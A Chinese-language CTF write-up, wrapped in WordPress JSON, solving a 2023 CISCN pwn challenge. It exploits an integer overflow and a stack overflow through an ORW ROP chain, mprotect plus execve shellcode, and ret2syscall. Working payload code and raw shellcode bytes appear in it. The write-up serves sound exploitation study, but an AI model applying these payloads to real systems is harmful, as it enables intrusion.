{"id":372,"date":"2024-12-13T17:20:46","date_gmt":"2024-12-13T09:20:46","guid":{"rendered":"http:\/\/8.141.27.105\/?p=372"},"modified":"2024-12-13T17:23:36","modified_gmt":"2024-12-13T09:23:36","slug":"2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2\/","title":{"rendered":"2023CISCN PWN\u90e8\u5206WP"},"content":{"rendered":"\n

\u70e7\u70e4\u644a(\u6574\u6570\u6ea2\u51fa+ROP+ORW)<\/p>\n\n\n\n

\u770b\u8d77\u6765\u50cf\u83dc\u5355\uff0c\u4f46\u662f\u4e0d\u662f\u5806\u9898\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

1\u8ddf2\u662f\u5564\u9152\u548c\u4e32\uff0c\u7528\u6765\u51cf\u53bb\u91d1\u989d\u7684\uff0c3\u662f\u770b\u8fd8\u5269\u591a\u5c11\u94b1\uff0c4\u662f\u4e70\u4e0b\u644a\u5b50\uff0c\u5173\u952e\u51fd\u6570\u5728gaiming\u91cc\u9762\uff0c\u6709\u4e2a\u5224\u65ad\u6761\u4ef6own\u3002<\/p>\n\n\n\n

\u53d1\u73b0\u57284\u91cc\u9762\uff0c\u5982\u679c\u4e70\u4e0b\u644a\u5b50\uff0cown\u5c31\u80fd\u4e3a1\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u5982\u4f55\u8ba9\u91d1\u989d\u8fbe\u523010000\uff1f<\/p>\n\n\n\n

\u770b\u4e00\u4e0bpijiu\u51fd\u6570\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6263\u94b1\u91c7\u7528\u5f88\u7c97\u66b4\u7684\u76f4\u63a5\u4e58\u4e00\u4e2a-10\uff0c\u90a3\u5982\u679c\u8f93\u5165\u8d2d\u4e70\u7684\u5564\u9152\u662f\u4e2a\u8d1f\u6570\uff0c\u5c31\u80fd\u52a0\u94b1<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u53ea\u8981\u8f93\u5165\u662f\u4e2a\u5f88\u5927\u7684\u8d1f\u6570\u5c31\u80fd\u7206\u5f88\u591a\u7c73\uff0c\u7136\u540e\u5c31\u80fd\u987a\u5229\u4e70\u4e0b\u644a\u5b50\uff0c\u8fdb\u5165gaiming\u51fd\u6570\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

gaiming\u51fd\u6570\u6709\u5f88\u660e\u663e\u7684\u6808\u6ea2\u51fa\uff0c\u8fd9\u9053\u9898\u7528checksec\u65f6\u5019\u53d1\u73b0\u6709canary\uff0c\u4f46\u662f\u7ecf\u8fc7\u6d4b\u8bd5\u5176\u5b9e\u662f\u6ca1\u6709\u7684\uff0c\u770b\u6c47\u7f16\u4ee3\u7801\u4e5f\u77e5\u9053\u5e76\u6ca1\u6709:<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

gaiming\u51fd\u6570\u5148scanf\u4e00\u4e2a\u503c\u7ed9v5\uff0cv5\u662f\u6808\u53d8\u91cf\uff0c\u7136\u540e\u628av5\u7684\u503c\u8d4b\u7ed9name\uff0cname\u662f\u4e2adata\u6bb5\u4e0a\u7684\u53d8\u91cf<\/p>\n\n\n\n

\u7531\u4e8e\u9898\u76ee\u6ca1\u6709\u540e\u95e8\u51fd\u6570\uff0c\u53c8\u662f\u9759\u6001\u7f16\u8bd1\uff0c\u6240\u4ee5\u6709\u4e09\u79cd\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n\n\n\n

1.mprotect+shellcode<\/p>\n\n\n\n

2.ORW<\/p>\n\n\n\n

3.ret2syscall<\/p>\n\n\n\n

\u5148\u5c55\u793a\u4e00\u4e0b\u7b2c\u4e8c\u79cd\u65b9\u6cd5ORW\uff1a<\/p>\n\n\n\n

ORW\u7684\u601d\u8def\u662f\uff0c\u5148\u628aflag\u8def\u5f84\u5199\u5165\uff0c\u540e\u9762\u53ef\u4ee5\u4f20\u7ed9name\uff0c\u7136\u540eopen\u4f20\u53c2name\u7684\u5730\u5740\uff0c\u6253\u5f00flag\u6587\u4ef6\uff0cread\u4e5f\u628a\u8bfb\u51fa\u6765\u7684\u5185\u5bb9\u5199\u5230name\u5730\u5740\uff0c\u6700\u540ewrite\u4ecename\u5730\u5740\u5199\u51fa\u6765flag<\/p>\n\n\n\n

open64(b”.\/flag”,0) 0 \u8868\u793a\u53ea\u8bfb<\/p>\n\n\n\n

read(3,name_addr,0x100) 3\u662f\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0cname_addr\u662f\u5199\u5165\u5730\u5740\uff0c0x100\u662f\u5199\u5165\u591a\u5c11<\/p>\n\n\n\n

write(1,name_addr,0x100) 1\u662f\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0cname_addr\u662f\u8bfb\u5199\u5730\u5740\uff0c0x100\u662f\u8bfb\u5199\u591a\u5c11\uff08\u8f93\u51fa\u5230\u5c4f\u5e55\uff09<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
# open(b'.\/flag\\x00\\x00', 0)\n\nORW = p64(pop_rdi_addr) + p64(name_addr) + p64(pop_rsi_addr) + p64(0) +p64(elf.sym[\"open64\"])\n\n# read(3, name_addr, 0x50)\n\nORW += p64(pop_rdi_addr) + p64(3) + p64(pop_rsi_addr) + p64(name_addr) + p64(pop_rdx_rbx_addr) + p64(0x100) + p64(0) + p64(elf.sym[\"read\"])\n\n# write(1, name_addr, 0x50)\n\nORW += p64(pop_rdi_addr) + p64(1) + p64(pop_rsi_addr) + p64(name_addr) + p64(pop_rdx_rbx_addr) + p64(0x100) + p64(0) + p64(elf.sym[\"write\"])<\/code><\/pre>\n\n\n\n
\u53ea\u8981\u4fdd\u8bc1rsi rdi rdx\u662f\u89c4\u5b9a\u503c\u5c31\u884c\uff0c\u53ef\u4ee5\u6709\u591a\u4f59\u5bc4\u5b58\u5668\uff0c\u7ed9\u4ed6\u4eec\u968f\u4fbf\u8d4b\u4ec0\u4e48\u503c\u90fd\u53ef\u4ee5\uff0c\u53ea\u8981\u8bb0\u5f97\u8d4b\u503c\u7ef4\u6301\u6808\u5e73\u8861\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53e6\u4e00\u79cd\u601d\u8def\uff1a<\/p>\n\n\n\n
\u867d\u7136\u6709NX\uff0c\u4f46\u662f\u60f3\u5230\u662f\u9759\u6001\u7f16\u8bd1\uff0c\u901a\u5e38\u90fd\u4f1a\u6709mprotect\uff0c\u7528mprotect\u4fee\u6539\u67d0\u6bb5\u4e3a\u53ef\u6267\u884c\uff0c\u7136\u540e\u5199\u5165shellcode\u8df3\u8f6c\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
mprotect\u8c03\u7528\uff1a<\/p>\n\n\n\n
payload1=cyclic(0x28)+p64(pop_rdi_addr)+p64(0x4E6000)+p64(pop_rsi_addr)+p64(0x3000)+p64(pop_rdx_rbx_addr)+p64(0x7)+p64(0)+p64(elf.sym[\"mprotect\"])+p64(ret_addr)+p64(elf.sym[\"main\"])\n\nio.sendline(payload1)<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u8c03\u7528\u5b8c\u540e\u518d\u8fd4\u56demain\u51fd\u6570\uff0c\u8fd9\u65f6\u5019\u5199\u5165shellcode\u5e76\u8df3\u8f6c\u5230name_addr\u6267\u884c<\/p>\n\n\n\n
payload = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'.ljust(0x28, b'a') +p64(name_addr)\nio.sendline(payload)<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u8fd9\u91cc\u6709\u51e0\u4e2a\u5751\u70b9\uff1a<\/p>\n\n\n\n
1.shellcode\u4e00\u5b9a\u8981\u627e\u5bf9\uff0c\u6211\u4e00\u5f00\u59cb\u627e\u768421\u5b57\u8282shellcode\u7528\u4e0d\u4e86\uff0c\u53c8\u627e\u4e86\u4e2a23\u5b57\u8282\u7684\u53ef\u4ee5\u7528\uff0c\u6240\u4ee5\u6709\u65f6\u5019\u62ff\u4e0d\u5230shell\u4e0d\u662f\u56e0\u4e3aexp\u5199\u4e0d\u5bf9\uff0c\u800c\u662f\u627e\u7684shellcode\u4e0d\u5bf9<\/p>\n\n\n\n
2.mprotect\u51fd\u6570\u6307\u5b9a\u7684\u4fee\u6539\u5730\u5740\u5fc5\u987b\u662f\u4e00\u4e2a\u5185\u5b58\u9875\u7684\u8d77\u59cb\u5730\u5740\uff0c\u800c\u4e14\u5927\u5c0f\u5fc5\u987b\u662f\u5185\u5b58\u9875\u6574\u6570\u500d\uff0c\u4e00\u9875\u662f4k\uff0c\u4e5f\u5c31\u662f0x1000,\u6240\u4ee5\u4fee\u6539\u5730\u5740\u5fc5\u987b\u4fdd\u8bc1\u540e\u4e09\u4f4d\u4e3a0\uff0c\u5927\u5c0f\u5fc5\u987b\u662fn*0x1000,\u800c\u6700\u540e\u8df3\u8f6c\u5230\u6267\u884cshellcode\u7684\u4f4d\u7f6e\u5e76\u4e0d\u662f\u4fee\u6539\u5185\u5b58\u9875\u7684\u8d77\u59cb\u4f4d\u7f6e\uff08\u4f4e\u7ea7\u9519\u8bef\uff09<\/p>\n\n\n\n
3.\u8bb0\u5f97\u6dfb\u52a0ret\u4fdd\u6301\u6808\u5e73\u8861<\/p>\n\n\n\n
\u5176\u5b9e\u8fd8\u6709\u66f4\u7b80\u5355\u7684\u4e00\u6761\u9f99\uff1a<\/p>\n\n\n\n
\u524d\u9762\u586b\u5145\u76f4\u63a5\u586bshellcode\uff0c\u540e\u9762\u8fd4\u56de\u4e0d\u7528\u8fd4\u56de\u5230main\uff0c\u76f4\u63a5\u56de\u5230shellcode\u6267\u884c\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
rop=p64(pop_rdi_addr)+p64(0x4E6000)+p64(pop_rsi_addr)+p64(0x3000)+p64(pop_rdx_rbx_addr)+p64(0x7)+p64(0)+p64(elf.sym[“mprotect”])+p64(ret_addr)+p64(name_addr)<\/p>\n\n\n\n
payload = b’\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05′.ljust(0x28, b’a’)<\/p>\n\n\n\n
payload += rop<\/p>\n\n\n\n
io.sendline(payload)<\/p>\n\n\n\n
\u7b2c\u4e09\u79cd\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
ret2syscall<\/p>\n\n\n\n
\u5177\u4f53\u4e0d\u7ec6\u8bf4\u4e86\uff0c\u6bd4\u8f83\u5e38\u89c4<\/p>\n\n\n\n
\n
\n
\u76ee\u5f55<\/p>\nToggle<\/span><\/path><\/svg><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n